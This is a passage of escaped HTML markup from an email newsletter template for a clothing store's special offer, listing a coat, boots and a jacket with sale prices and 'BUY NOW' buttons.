120%;\\\"><span style=\\\"font-size: 38px; line-height: 45.6px;\\\"><strong><span style=\\\"line-height: 45.6px; font-family: \'Open Sans\', sans-serif; font-size: 38px;\\\">SPECIAL OFFER<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 0px 30px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 20px; line-height: 28px;\\\"><strong><span style=\\\"line-height: 28px; font-size: 20px;\\\"><span style=\\\"color: #db1908; line-height: 28px; font-size: 20px;\\\">BEST SALE<\\/span>&nbsp;FROM OUR STORE<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #f5f5f5\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #f5f5f5;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"left\\\">\\r\\n      \\r\\n      <img align=\\\"left\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1603386706031-1.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_12\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>OUTERWEAR <\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_13\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #1b2a2f; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px;\\\"><strong>BLACK COAT<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_14\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 120%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><strong><span style=\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\"><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">$3099<\\/span><\\/span><\\/strong><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">&nbsp; &nbsp; &nbsp; &nbsp;<strong><span style=\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\">$2599<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_3\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-spacing: 0; border-collapse: collapse; mso-table-lspace:0pt; mso-table-rspace:0pt;font-family:\'Open Sans\',sans-serif;\\\"><tr><td class=\\\"v-text-align\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\"><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:46px; v-text-anchor:middle; width:115px;\\\" arcsize=\\\"0%\\\" stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:15px 25px;line-height:120%;\\\"><span style=\\\"font-size: 14px; line-height: 16.8px;\\\">BUY NOW<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><\\/td><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1603386599703-453082\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_9\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>SHOES <\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_10\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #1b2a2f; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px;\\\"><strong>BROWN BOOTS<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_11\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 120%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><strong><span style=\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\"><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">$790<\\/span><\\/span><\\/strong><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">&nbsp; &nbsp; &nbsp; &nbsp;<strong><span style=\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\">$650<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_2\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-spacing: 0; border-collapse: collapse; mso-table-lspace:0pt; mso-table-rspace:0pt;font-family:\'Open Sans\',sans-serif;\\\"><tr><td class=\\\"v-text-align\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\"><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:46px; v-text-anchor:middle; width:115px;\\\" arcsize=\\\"0%\\\" stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:15px 25px;line-height:120%;\\\"><span style=\\\"font-size: 14px; line-height: 16.8px;\\\">BUY NOW<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><\\/td><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:12px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #f5f5f5\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #f5f5f5;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"291\\\" style=\\\"width: 291px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-48p5\\\" style=\\\"max-width: 320px;min-width: 291px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"left\\\">\\r\\n      \\r\\n      <img align=\\\"left\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1603387056042-675512\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 271px;\\\" width=\\\"271\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_24\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>OUTERWEAR <\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_25\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #1b2a2f; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px;\\\"><strong>BROWN&nbsp; JACKET<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_17\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 120%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><strong><span style=\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\"><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">$2099<\\/span><\\/span><\\/strong><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">&nbsp; &nbsp; &nbsp; &nbsp;<strong><span style=\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\">$1299<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_4\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-spacing: 0; border-collapse: collapse; mso-table-lspace:0pt; mso-table-rspace:0pt;font-family:\'Open Sans\',sans-serif;\\\"><tr><td class=\\\"v-text-align\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\"><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:46px; v-text-anchor:middle; width:115px;\\\" arcsize=\\\"0%\\\" stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:15px 25px;line-height:120%;\\\"><span style=\\\"font-size: 14px; line-height: 16.8px;\\\">BUY NOW<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><\\/td><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"309\\\" style=\\\"width: 309px;padding: 0px;border-top: 0px solid transparent;border-left: 